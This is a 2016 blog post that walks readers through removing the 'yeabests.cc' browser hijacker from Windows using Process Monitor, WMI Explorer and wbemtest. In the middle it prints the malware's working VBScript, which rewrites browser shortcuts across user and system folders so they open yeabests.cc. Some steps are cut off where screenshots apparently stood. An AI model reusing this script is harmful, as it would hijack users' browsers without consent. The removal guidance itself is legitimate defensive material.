Focused Facts

Main focus of this blog is to provide you the latest facts and entertainment content that you might be missing.

Tuesday, 16 August 2016

How to Remove yeabests.cc virus from system

Posted by ItsFact on 12:30 No comments
Hello all,

 I was already frustrated from this virus when it hijacked my pc last week.

Moving to steps

Files Required

ProcessMonitor

WMIExplorer

Open Process Monitor Goto Process Monitor filter
Select Path -> Contains -> Google Chrome.lnk then Include
Click Add
Press Ok



First remove chrome shortcut containing extra link like --load extension .... bla bla bla

Now constantly check chrome shortcut and As soon as it again gets renamed note the time and
Come back to process monitor and note the file name which had just done "Write" Operation
That's it this file was responsible for doing the changes.

Now I got clue that scrcons.exe was responsible to do this.

Ok now  moving forward I research a lot and got that this is advance version of running vbscript program without storing the file.

Voila

Now Open WMIExplorer


Below is the VB code that was executing

Below is the content of VBScript used to hijack browsers:
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
 BrowserDic.Add LCase(browser), browser
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\MyUser\Desktop"
FoldersDic(5) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\MyUser\AppData\Roaming"
FoldersDic(9) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
 For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
   End If
  End If
 Next
Next
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0


Now open C:\Windows\System32\wbem and then right click on wbemtest to open in admin mode 

Now Follow steps as







Only thing left is to remove argument from your browser shortcuts.
  • Right click on desired shortcut and select Properties.
  • Remove http://yeabests.cc argument after "
  • Click OK to apply changes.

No comments :

Post a Comment

Subscribe to: Post Comments ( Atom )